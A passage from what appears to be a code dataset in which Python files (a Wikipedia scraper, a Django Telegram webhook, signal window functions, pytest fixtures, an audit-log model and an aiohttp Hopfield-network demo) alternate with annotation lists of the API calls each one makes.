'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['input_ts'], {}), '(input_ts)\n', (4025, 4035), False, 'from onnx import numpy_helper\n'), ((9705, 9724), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9722, 9724), False, 'import time\n'), ((9755, 9800), 'onnxruntime.InferenceSession', 
'onnxruntime.InferenceSession', (['temp_model_path'], {}), '(temp_model_path)\n', (9783, 9800), False, 'import onnxruntime\n'), ((9892, 9911), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9909, 9911), False, 'import time\n'), ((10572, 10595), 'numpy.ndenumerate', 'np.ndenumerate', (['outs[i]'], {}), '(outs[i])\n', (10586, 10595), True, 'import numpy as np\n'), ((5952, 5996), 'numpy.random.uniform', 'np.random.uniform', (['(-1.0)', '(1.0)', 'explicit_shape'], {}), '(-1.0, 1.0, explicit_shape)\n', (5969, 5996), True, 'import numpy as np\n')] |
import requests
from json import loads
from bs4 import BeautifulSoup
from os import environ
# Keywords used elsewhere in this module to decide whether a page is
# space/astronomy related.
l = ['atom','moon','star','space','astro','cluster','galaxy','sky','planet','solar','science','physic','scientist','cosmos']


def clean(text):
    """Remove bracketed reference markers such as '[1]' from *text*.

    Bug fix: a '[' with no matching ']' previously caused an infinite loop,
    because ``text.find(']', ...)`` returned -1, producing an empty slice
    and a no-op ``replace('', '')``.  Such input is now returned unchanged.
    """
    while '[' in text:
        start = text.find('[')
        end = text.find(']', start)
        if end == -1:
            # Unmatched '[': nothing sensible to strip, stop here.
            break
        text = text.replace(text[start:end + 1], '')
    return text
def get_wiki(search_query):
    """Scrape the English-Wikipedia article for *search_query*.

    Returns ``(text, image, desc)`` on success, or ``(None, None, reason)``
    when the page is not space-related or could not be resolved.
    """
    if len(search_query.split()) == 1:
        search_query = search_query.capitalize()
    not_space = False
    try:
        headers = {
        'Authorization': environ['api_key5'],
        'User-Agent': 'Advaith'
        }
        page = f'https://en.wikipedia.org/w/rest.php/v1/page/{search_query}/html'
        req = requests.get(page).text
        soup = BeautifulSoup(req,'lxml')
        d = {}
        try:
            # For disambiguation ("refer") pages there is no usable summary;
            # d['13'] raises KeyError on purpose to jump to the link scan
            # in the except branch below.
            if 'refer' in soup.find_all('p')[1].text:
                x = d['13']
            text = soup.find_all('p')[0].text
            i = 1
            # Skip short stub paragraphs until one looks like a real summary.
            while len(text) < 100:
                text = soup.find_all('p')[i].text
                i += 1
            if any([z in text.lower() for z in l]):
                text = clean(text)
                correct = True
            else:
                not_space = True
                correct = False
        except:
            # Fallback: follow the first space-related link on the page
            # and retry the summary extraction there.
            for i in soup.find_all('a'):
                if any([z in i.text.lower() for z in l]):
                    try:
                        search_query = i['href'][1:]
                        page = 'https://en.wikipedia.org/w/rest.php/v1/page' + i['href'] [1:] + '/html'
                        req = requests.get(page).text
                        soup = BeautifulSoup(req,'lxml')
                        i = 1
                        text = soup.find_all('p')[0].text
                        while len(text) < 100:
                            text = soup.find_all('p')[i].text
                            i += 1
                        text = clean(text)
                        correct = True
                        break
                    except:
                        continue
            else:
                correct = False
        if correct:
            # Fetch a thumbnail for the resolved article via the search API.
            url = 'https://api.wikimedia.org/core/v1/wikipedia/en/search/page'
            parameters = {'q': search_query, 'limit': 1}
            response = loads(requests.get(url, headers=headers, params=parameters).text)
            image = 'https:' + response['pages'][0]['thumbnail']['url'].replace('200px','500px')
            try:
                desc = clean(soup.find('div', attrs = {'class':'infobox-caption'}).text)
            except:
                try:
                    desc = clean(soup.find('figcaption').text)
                except:
                    desc = search_query
        else:
            image = None
    except Exception as e:
        print(e)
    try:
        # text/image/desc may be unbound if anything above failed;
        # the NameError is caught below to produce a failure tuple.
        return text,image,desc
    except:
        if not_space:
            return None,None,'is not a space query'
        else:
            return None,None,'could not be resolved'
        # return None,None,'Not found'
        #return get_wiki(search_query + ' (moon)')
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((775, 801), 'bs4.BeautifulSoup', 'BeautifulSoup', (['req', '"""lxml"""'], {}), "(req, 'lxml')\n", (788, 801), False, 'from bs4 import BeautifulSoup\n'), ((736, 754), 'requests.get', 'requests.get', (['page'], {}), '(page)\n', (748, 754), False, 'import requests\n'), ((2338, 2391), 'requests.get', 'requests.get', (['url'], {'headers': 'headers', 'params': 'parameters'}), '(url, headers=headers, params=parameters)\n', (2350, 2391), False, 'import requests\n'), ((1670, 1696), 'bs4.BeautifulSoup', 'BeautifulSoup', (['req', '"""lxml"""'], {}), "(req, 'lxml')\n", (1683, 1696), False, 'from bs4 import BeautifulSoup\n'), ((1615, 1633), 'requests.get', 'requests.get', (['page'], {}), '(page)\n', (1627, 1633), False, 'import requests\n')] |
from django.shortcuts import render
from django.http import JsonResponse
from django.views import View
from core.handlers.dispatcher import process_telegram_event
from app_my_places.settings import TELEGRAM_TOKEN
import json
# Create your views here.
def index(request):
    """Catch-all view: direct access is rejected with a JSON error body."""
    return JsonResponse({"error": "forbidden"})
class TelegramBotWebhookView(View):
    """Receives Telegram webhook updates and forwards them to the dispatcher."""

    def post(self, request, *args, **kwargs):
        # Telegram delivers the update as a JSON request body.
        payload = json.loads(request.body)
        process_telegram_event(payload)
        return JsonResponse({"post": "work!"})

    def get(self, request, *args, **kwargs):
        return JsonResponse({"ok": "Get response work!"})
| [
"json.loads",
"django.http.JsonResponse"
] | [((284, 320), 'django.http.JsonResponse', 'JsonResponse', (["{'error': 'forbidden'}"], {}), "({'error': 'forbidden'})\n", (296, 320), False, 'from django.http import JsonResponse\n'), ((477, 508), 'django.http.JsonResponse', 'JsonResponse', (["{'post': 'work!'}"], {}), "({'post': 'work!'})\n", (489, 508), False, 'from django.http import JsonResponse\n'), ((570, 612), 'django.http.JsonResponse', 'JsonResponse', (["{'ok': 'Get response work!'}"], {}), "({'ok': 'Get response work!'})\n", (582, 612), False, 'from django.http import JsonResponse\n'), ((436, 460), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (446, 460), False, 'import json\n')] |
# Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def db2lin(val):
    """
    Convert values from the dB domain to the linear domain.

    Parameters
    ----------
    val : numpy.ndarray
        Values in dB domain.

    Returns
    -------
    val : numpy.ndarray
        Values in linear domain.
    """
    exponent = val / 10.
    return 10 ** exponent
def lin2db(val):
    """
    Convert values from the linear domain to the dB domain.

    Parameters
    ----------
    val : numpy.ndarray
        Values in linear domain.

    Returns
    -------
    val : numpy.ndarray
        Values in dB domain.
    """
    log_val = np.log10(val)
    return 10. * log_val
def get_window_radius(window, hp_radius):
    """
    Calculate the window-function radius needed to achieve the given
    half power radius.

    Parameters
    ----------
    window : string
        Window function name ('hamming' or 'boxcar', case-insensitive).
    hp_radius : float32
        Half power radius. Radius of window function for weight
        equal to 0.5 (-3 dB). In the spatial domain this corresponds to
        half of the spatial resolution one would like to achieve with the
        given window.

    Returns
    -------
    r : float32
        Window radius needed to achieve the given half power radius.

    Raises
    ------
    ValueError
        If the window name is not supported.
    """
    name = window.lower()
    hp_weight = 0.5
    if name == 'boxcar':
        # A boxcar is flat, so its radius equals the half power radius.
        return hp_radius
    if name == 'hamming':
        # Invert w(d) = alpha + (1 - alpha) * cos(pi * d / r) at w = 0.5.
        alpha = 0.54
        return (np.pi * hp_radius) / np.arccos((hp_weight - alpha) / (1 - alpha))
    raise ValueError('Window name not supported.')
def hamming_window(radius, distances):
    """
    Hamming window filter.

    Parameters
    ----------
    radius : float32
        Radius of the window.
    distances : numpy.ndarray
        Array with distances.

    Returns
    -------
    weights : numpy.ndarray
        Distance weights.
    tw : float32
        Sum of weights.
    """
    alpha = 0.54
    # Classic Hamming shape: alpha + (1 - alpha) * cos(pi * d / r).
    weights = alpha + (1 - alpha) * np.cos(np.pi / radius * distances)
    total = np.sum(weights)
    return weights, total
def boxcar(radius, distance):
    """
    Boxcar (rectangular) window filter: weight 1 inside the radius, 0 outside.

    Parameters
    ----------
    radius : float32
        Radius of the window.
    distance : numpy.ndarray
        Array with distances.

    Returns
    -------
    weights : numpy.ndarray
        Distance weights.
    tw : float32
        Sum of weights.
    """
    weights = np.zeros(distance.size)
    within = distance <= radius
    weights[within] = 1.
    return weights, np.sum(weights)
def get_window_weights(window, radius, distance, norm=False):
    """
    Return the weights of the given window function for the given distances.

    Parameters
    ----------
    window : str
        Window function name ('hamming' or 'boxcar').
    radius : float
        Radius of the window.
    distance : numpy.ndarray
        Distance array.
    norm : boolean
        If true, normalised weights will be returned.

    Returns
    -------
    weights : numpy.ndarray
        Weights according to distances and given window function.
    """
    if window == 'hamming':
        weights, total = hamming_window(radius, distance)
    elif window == 'boxcar':
        weights, total = boxcar(radius, distance)
    else:
        raise ValueError('Window name not supported.')
    # `is True` kept deliberately: only the exact boolean triggers
    # normalisation, matching the original contract.
    if norm is True:
        weights = weights / total
    return weights
| [
"numpy.log10",
"numpy.arccos",
"numpy.sum",
"numpy.zeros",
"numpy.cos"
] | [((3934, 3957), 'numpy.zeros', 'np.zeros', (['distance.size'], {}), '(distance.size)\n', (3942, 3957), True, 'import numpy as np\n'), ((2192, 2205), 'numpy.log10', 'np.log10', (['val'], {}), '(val)\n', (2200, 2205), True, 'import numpy as np\n'), ((3659, 3674), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (3665, 3674), True, 'import numpy as np\n'), ((4016, 4031), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (4022, 4031), True, 'import numpy as np\n'), ((3033, 3077), 'numpy.arccos', 'np.arccos', (['((hp_weight - alpha) / (1 - alpha))'], {}), '((hp_weight - alpha) / (1 - alpha))\n', (3042, 3077), True, 'import numpy as np\n'), ((3603, 3637), 'numpy.cos', 'np.cos', (['(np.pi / radius * distances)'], {}), '(np.pi / radius * distances)\n', (3609, 3637), True, 'import numpy as np\n')] |
import pytest
import tempfile
@pytest.fixture
def post(user):
    # Plain post by *user*; the image path points at a temp file name only
    # (the file itself is never created).
    from posts.models import Post
    image = tempfile.NamedTemporaryFile(suffix=".jpg").name
    return Post.objects.create(text='Тестовый пост 1', author=user, image=image)
# Group without any posts attached.
@pytest.fixture
def group():
    from posts.models import Group
    return Group.objects.create(title='Тестовая группа 1', slug='test-link', description='Тестовое описание группы')
# Post that belongs to the `group` fixture.
@pytest.fixture
def post_with_group(user, group):
    from posts.models import Post
    image = tempfile.NamedTemporaryFile(suffix=".jpg").name
    return Post.objects.create(text='Тестовый пост 2', author=user, group=group, image=image)
# Two independent storages for stock-distribution tests.
@pytest.fixture
def storage_1():
    from warehouse.models import Storage
    return Storage.objects.create(name='storage_1')
@pytest.fixture
def storage_2():
    from warehouse.models import Storage
    return Storage.objects.create(name='storage_2')
@pytest.fixture
def material():
    from warehouse.models import Material
    return Material.objects.create(name='material')
@pytest.fixture
def instrument():
    from warehouse.models import Instrument
    return Instrument.objects.create(name='instrument')
# The same material stocked in both storages with different amounts.
@pytest.fixture
def material_in_storage_1(material, storage_1):
    from warehouse.models import MaterialStorage
    return MaterialStorage.objects.create(material=material, storage=storage_1, amount=2)
@pytest.fixture
def material_in_storage_2(material, storage_2):
    from warehouse.models import MaterialStorage
    return MaterialStorage.objects.create(material=material, storage=storage_2, amount=4)
| [
"warehouse.models.Storage.objects.create",
"posts.models.Post.objects.create",
"warehouse.models.MaterialStorage.objects.create",
"warehouse.models.Material.objects.create",
"posts.models.Group.objects.create",
"warehouse.models.Instrument.objects.create",
"tempfile.NamedTemporaryFile"
] | [((169, 238), 'posts.models.Post.objects.create', 'Post.objects.create', ([], {'text': '"""Тестовый пост 1"""', 'author': 'user', 'image': 'image'}), "(text='Тестовый пост 1', author=user, image=image)\n", (188, 238), False, 'from posts.models import Post\n'), ((316, 425), 'posts.models.Group.objects.create', 'Group.objects.create', ([], {'title': '"""Тестовая группа 1"""', 'slug': '"""test-link"""', 'description': '"""Тестовое описание группы"""'}), "(title='Тестовая группа 1', slug='test-link',\n description='Тестовое описание группы')\n", (336, 425), False, 'from posts.models import Group\n'), ((579, 666), 'posts.models.Post.objects.create', 'Post.objects.create', ([], {'text': '"""Тестовый пост 2"""', 'author': 'user', 'group': 'group', 'image': 'image'}), "(text='Тестовый пост 2', author=user, group=group, image\n =image)\n", (598, 666), False, 'from posts.models import Post\n'), ((749, 789), 'warehouse.models.Storage.objects.create', 'Storage.objects.create', ([], {'name': '"""storage_1"""'}), "(name='storage_1')\n", (771, 789), False, 'from warehouse.models import Storage\n'), ((877, 917), 'warehouse.models.Storage.objects.create', 'Storage.objects.create', ([], {'name': '"""storage_2"""'}), "(name='storage_2')\n", (899, 917), False, 'from warehouse.models import Storage\n'), ((1005, 1045), 'warehouse.models.Material.objects.create', 'Material.objects.create', ([], {'name': '"""material"""'}), "(name='material')\n", (1028, 1045), False, 'from warehouse.models import Material\n'), ((1137, 1181), 'warehouse.models.Instrument.objects.create', 'Instrument.objects.create', ([], {'name': '"""instrument"""'}), "(name='instrument')\n", (1162, 1181), False, 'from warehouse.models import Instrument\n'), ((1308, 1386), 'warehouse.models.MaterialStorage.objects.create', 'MaterialStorage.objects.create', ([], {'material': 'material', 'storage': 'storage_1', 'amount': '(2)'}), '(material=material, storage=storage_1, amount=2)\n', (1338, 1386), False, 'from 
warehouse.models import MaterialStorage\n'), ((1513, 1591), 'warehouse.models.MaterialStorage.objects.create', 'MaterialStorage.objects.create', ([], {'material': 'material', 'storage': 'storage_2', 'amount': '(4)'}), '(material=material, storage=storage_2, amount=4)\n', (1543, 1591), False, 'from warehouse.models import MaterialStorage\n'), ((110, 152), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".jpg"""'}), "(suffix='.jpg')\n", (137, 152), False, 'import tempfile\n'), ((520, 562), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'suffix': '""".jpg"""'}), "(suffix='.jpg')\n", (547, 562), False, 'import tempfile\n')] |
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
# Shared keyword arguments for the sparse target foreign keys on Entry:
# every target is optional, and entries survive deletion of the referenced row.
TARGET_FKEY_ATTRS = {
    "null": True,
    "blank": True,
    "on_delete": models.SET_NULL,
}
class Entry(models.Model):
    """
    A single audit/event-log entry.

    Records who did what, when, and from where; a set of sparse foreign keys
    points at the object(s) the action concerned. ``send_updates`` fans an
    entry out to matching Subscriptions (see .subscription).
    """
    # Indexed because entries are ordered newest-first (see Meta.ordering).
    created_at = models.DateTimeField(auto_now_add=True, db_index=True)
    # The acting user; nullable so entries survive user deletion.
    created_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    # Identifier of the event type; resolved via the registry
    # (see entry_type_metadata below).
    entry_type = models.CharField(max_length=255)
    context = models.CharField(
        max_length=1024,
        blank=True,
        default='',
        verbose_name=_('Context'),
        help_text=_('The URL of the view in which the event occurred.'),
    )
    ip_address = models.CharField(
        max_length=48,
        blank=True,
        default='',
        verbose_name=_('IP address'),
        help_text=_('The IP address this action was performed from.'),
    )
    # various target fkeys, sparse
    event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
    person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
    organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
    feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
    event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
    global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
    search_term = models.CharField(max_length=255, blank=True, default='')
    # we should probably have shoved them in a jsonfield in the first place
    other_fields = JSONField(blank=True, default=dict)
    @property
    def survey_result(self):
        """
        Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
        """
        return self.event_survey_result if self.event_survey_result else self.global_survey_result
    @property
    def cbac_claims(self):
        """Render the "claims" dict from other_fields as a "key=value, ..." string."""
        return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
    @property
    def signup(self):
        """
        The labour Signup matching this entry's event and person, or None
        when either target is missing or no such Signup exists.
        """
        from labour.models import Signup
        if not self.event or not self.person:
            return None
        try:
            return Signup.objects.get(event=self.event, person=self.person)
        except Signup.DoesNotExist:
            return None
    def send_updates(self):
        """
        Deliver this entry to every active Subscription whose filters match.

        Builds one Q expression combining the entry-type, event, event-survey
        and job-category filters, then calls send_update_for_entry on each
        matching Subscription.
        """
        from .subscription import Subscription
        q = Q(entry_type=self.entry_type, active=True)
        # TODO need a more flexible filter solution that does not hard-code these
        # One option would be to specify filter = JSONField in Subscription.
        # Implementing this filter would require a client-side check or one SQL query
        # per Subscription, however, as we query Subscriptions by Entry and not vice versa.
        if self.event:
            # Implement the event filter. Subscriptions without event_filter receive updates from
            # all events. Subscriptions with event_filter receive only updates from that event.
            q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
        if self.event_survey_result:
            # Implement event survey filter.
            survey = self.event_survey_result.survey
            q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
        if self.event and self.person:
            # Implement job category filter
            from labour.models import Signup
            try:
                signup = Signup.objects.get(event=self.event, person=self.person)
            except Signup.DoesNotExist:
                pass
            else:
                # Match subscriptions filtered on any of the signup's applied-for
                # or accepted job categories, or not filtered at all.
                q &= (
                    Q(job_category_filter__in=signup.job_categories.all()) |
                    Q(job_category_filter__in=signup.job_categories_accepted.all()) |
                    Q(job_category_filter__isnull=True)
                )
        for subscription in Subscription.objects.filter(q):
            subscription.send_update_for_entry(self)
    @property
    def entry_type_metadata(self):
        """Registry metadata for this entry_type, memoized on the instance."""
        if not hasattr(self, '_entry_type_metadata'):
            from .. import registry
            self._entry_type_metadata = registry.get(self.entry_type)
        return self._entry_type_metadata
    @property
    def email_reply_to(self):
        """Reply-To for notification e-mails; metadata value may be a callable."""
        meta = self.entry_type_metadata
        if callable(meta.email_reply_to):
            return meta.email_reply_to(self)
        else:
            return meta.email_reply_to
    @property
    def message(self):
        """Human-readable message; metadata value is a callable or a format string."""
        meta = self.entry_type_metadata
        if callable(meta.message):
            return meta.message(self)
        else:
            return meta.message.format(entry=self)
    @property
    def email_subject(self):
        """Notification e-mail subject: "[installation] message"."""
        return '[{app_name}] {message}'.format(
            app_name=settings.KOMPASSI_INSTALLATION_NAME,
            message=self.message,
        )
    @property
    def email_body(self):
        """Notification e-mail body; metadata may provide a callable or a template name."""
        meta = self.entry_type_metadata
        if callable(meta.email_body_template):
            return meta.email_body_template(self)
        else:
            return render_to_string(meta.email_body_template, dict(
                entry=self,
                settings=settings,
            ))
    class Meta:
        verbose_name = _('log entry')
        verbose_name_plural = _('log entries')
        ordering = ('-created_at',)
| [
"django.utils.translation.ugettext_lazy",
"django.contrib.postgres.fields.JSONField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.Q",
"labour.models.Signup.objects.get",
"django.db.models.CharField"
] | [((392, 446), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'db_index': '(True)'}), '(auto_now_add=True, db_index=True)\n', (412, 446), False, 'from django.db import models\n'), ((464, 562), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.SET_NULL', 'null': '(True)', 'blank': '(True)'}), '(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null\n =True, blank=True)\n', (481, 562), False, 'from django.db import models\n'), ((614, 646), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (630, 646), False, 'from django.db import models\n'), ((1119, 1171), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Event"""'], {}), "('core.Event', **TARGET_FKEY_ATTRS)\n", (1136, 1171), False, 'from django.db import models\n'), ((1185, 1238), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Person"""'], {}), "('core.Person', **TARGET_FKEY_ATTRS)\n", (1202, 1238), False, 'from django.db import models\n'), ((1258, 1317), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""core.Organization"""'], {}), "('core.Organization', **TARGET_FKEY_ATTRS)\n", (1275, 1317), False, 'from django.db import models\n'), ((1341, 1407), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""feedback.FeedbackMessage"""'], {}), "('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)\n", (1358, 1407), False, 'from django.db import models\n'), ((1434, 1501), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""surveys.EventSurveyResult"""'], {}), "('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)\n", (1451, 1501), False, 'from django.db import models\n'), ((1529, 1597), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""surveys.GlobalSurveyResult"""'], {}), "('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)\n", (1546, 1597), False, 'from django.db import models\n'), ((1616, 1672), 
'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'blank': '(True)', 'default': '""""""'}), "(max_length=255, blank=True, default='')\n", (1632, 1672), False, 'from django.db import models\n'), ((1769, 1804), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'blank': '(True)', 'default': 'dict'}), '(blank=True, default=dict)\n', (1778, 1804), False, 'from django.contrib.postgres.fields import JSONField\n'), ((2608, 2650), 'django.db.models.Q', 'Q', ([], {'entry_type': 'self.entry_type', 'active': '(True)'}), '(entry_type=self.entry_type, active=True)\n', (2609, 2650), False, 'from django.db.models import Q\n'), ((5453, 5467), 'django.utils.translation.ugettext_lazy', '_', (['"""log entry"""'], {}), "('log entry')\n", (5454, 5467), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((5498, 5514), 'django.utils.translation.ugettext_lazy', '_', (['"""log entries"""'], {}), "('log entries')\n", (5499, 5514), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((765, 777), 'django.utils.translation.ugettext_lazy', '_', (['"""Context"""'], {}), "('Context')\n", (766, 777), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((797, 850), 'django.utils.translation.ugettext_lazy', '_', (['"""The URL of the view in which the event occurred."""'], {}), "('The URL of the view in which the event occurred.')\n", (798, 850), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((977, 992), 'django.utils.translation.ugettext_lazy', '_', (['"""IP address"""'], {}), "('IP address')\n", (978, 992), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1012, 1063), 'django.utils.translation.ugettext_lazy', '_', (['"""The IP address this action was performed from."""'], {}), "('The IP address this action was performed from.')\n", (1013, 1063), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((2402, 2458), 'labour.models.Signup.objects.get', 
'Signup.objects.get', ([], {'event': 'self.event', 'person': 'self.person'}), '(event=self.event, person=self.person)\n', (2420, 2458), False, 'from labour.models import Signup\n'), ((3224, 3250), 'django.db.models.Q', 'Q', ([], {'event_filter': 'self.event'}), '(event_filter=self.event)\n', (3225, 3250), False, 'from django.db.models import Q\n'), ((3253, 3281), 'django.db.models.Q', 'Q', ([], {'event_filter__isnull': '(True)'}), '(event_filter__isnull=True)\n', (3254, 3281), False, 'from django.db.models import Q\n'), ((3435, 3464), 'django.db.models.Q', 'Q', ([], {'event_survey_filter': 'survey'}), '(event_survey_filter=survey)\n', (3436, 3464), False, 'from django.db.models import Q\n'), ((3467, 3502), 'django.db.models.Q', 'Q', ([], {'event_survey_filter__isnull': '(True)'}), '(event_survey_filter__isnull=True)\n', (3468, 3502), False, 'from django.db.models import Q\n'), ((3675, 3731), 'labour.models.Signup.objects.get', 'Signup.objects.get', ([], {'event': 'self.event', 'person': 'self.person'}), '(event=self.event, person=self.person)\n', (3693, 3731), False, 'from labour.models import Signup\n'), ((4017, 4052), 'django.db.models.Q', 'Q', ([], {'job_category_filter__isnull': '(True)'}), '(job_category_filter__isnull=True)\n', (4018, 4052), False, 'from django.db.models import Q\n')] |
import aiohttp_jinja2
import jinja2
import secrets
import random
from aiohttp import web
from aiohttp.client import MultiDict
from source import fit_model, vectorize, model_predict
routes = web.RouteTableDef()
PORT = 8080
base_url = f"http://localhost:{PORT}"
# Default grid: IMGS training images, each X columns by Y rows.
IMGS, X, Y = 3, 5, 7
# Default probability of flipping a pixel when randomizing an image.
THRESH = 0.1
# Fitted models keyed by token: token -> ((x, y, imgs), images, weights).
networks = {}
@routes.get('/')
async def setup(request: web.Request):
    """Redirect the root URL to the fit page with the default dimensions."""
    target = f"{base_url}/fit/{IMGS}:{X}-{Y}"
    raise web.HTTPFound(location=target)
@routes.get('/fit/{imgs}:{x}-{y}')
@aiohttp_jinja2.template('fit.html')
async def web_fit(request: web.Request):
    """Render the training form for the requested image count and grid size."""
    info = request.match_info
    context = {'base_url': base_url}
    for key in ('imgs', 'x', 'y'):
        context[key] = int(info[key])
    return context
@routes.post('/change')
async def change_dim(request: web.Request):
    """Redirect to a fit page using the posted dimensions, defaulting empty fields."""
    data = await request.post()
    imgs = data['imgs'] or IMGS
    x = data['x'] or X
    y = data['y'] or Y
    raise web.HTTPFound(location=f"{base_url}/fit/{imgs}:{x}-{y}")
def _create_images(x, y, imgs, data):
    """
    Build `imgs` grids of y rows by x columns filled with -1, set each pixel
    checked in the form data (keys "img:col-row") to 1, and vectorize each grid.
    """
    grids = [[[-1] * x for _ in range(y)] for _ in range(imgs)]
    for field in data.keys():
        idx, coords = field.split(':')
        col, row = coords.split('-')
        grids[int(idx)][int(row)][int(col)] = 1
    return [vectorize(grid) for grid in grids]
def _create_image(x, y, data):
    """
    Build one grid of y rows by x columns filled with -1, set each pixel
    checked in the form data (keys "col-row") to 1, and vectorize it.
    """
    grid = [[-1] * x for _ in range(y)]
    for field in data.keys():
        col, row = field.split('-')
        grid[int(row)][int(col)] = 1
    return vectorize(grid)
@routes.post('/fit')
async def fit(request: web.Request):
    """
    Validate the posted training data, fit a model and redirect to its
    prediction page keyed by a fresh token.

    Raises HTTPBadRequest for an invalid image count or grid size.
    """
    data = await request.post()
    data = MultiDict(data)
    imgs = int(data.pop('imgs'))
    # BUG FIX: the original accepted imgs == 0, which later crashes
    # random.randrange(0, 0) in the predict view; require at least one image.
    if imgs < 1:
        raise web.HTTPBadRequest(text=f"Invalid images number: {imgs}")
    x = int(data.pop('x'))
    y = int(data.pop('y'))
    # The network only supports between 15 and 50 pixels per image.
    if x * y < 15 or x * y > 50:
        raise web.HTTPBadRequest(text=f"Invalid XY combination: X={x}, Y={y}, XY={x * y}")
    # Build the matrices of all training images from the form fields.
    images = _create_images(x, y, imgs, data)
    token = secrets.token_hex(8)
    networks[token] = ((x, y, imgs), images, fit_model(images))
    raise web.HTTPFound(location=f"{base_url}/predict/{token}")
@routes.get('/weights/{token}')
async def get_weights(request: web.Request):
    """Return the fitted weight matrix for the given token as plain text."""
    token = request.match_info['token']
    network = networks.get(token)
    if network is None:
        # Previously an unknown token raised an unhandled KeyError (HTTP 500).
        raise web.HTTPNotFound(text=f"Unknown model token: {token}")
    raise web.HTTPOk(text=str(network[-1]))
@routes.get('/predict/{token}')
@aiohttp_jinja2.template('predict.html')
async def web_predict(request: web.Request):
    """
    Render the prediction page for one stored training image, optionally
    flipping each pixel with probability `randomize` (query parameter).
    """
    token = request.match_info['token']
    randomize = request.url.query.get('randomize') or THRESH
    try:
        randomize = float(randomize)
    except ValueError:
        randomize = THRESH
    if randomize < 0. or randomize > 1.:
        # BUG FIX: the original f-string referenced an undefined name `by`,
        # raising NameError instead of returning HTTP 400.
        raise web.HTTPBadRequest(text=f"Probability value exceeds [0, 1] limits: randomize={randomize}")
    (x, y, imgs), images, weights = networks[token]
    # Randomly flip pixels of the stored images when the option was given
    if request.url.query.get('randomize'):
        images = [[-val if random.random() < randomize else val
                   for val in im]
                  for im in images]
    im_idx = random.randrange(0, imgs)
    return {
        'x': x,
        'y': y,
        'image': images[im_idx],
        'token': token,
        'randomize': randomize
    }
@routes.post('/predict/{token}')
@aiohttp_jinja2.template('result.html')
async def predict(request: web.Request):
    """Run the stored network on the submitted image and render the result page."""
    token = request.match_info['token']
    data = await request.post()
    (x, y, _), images, weights = networks[token]
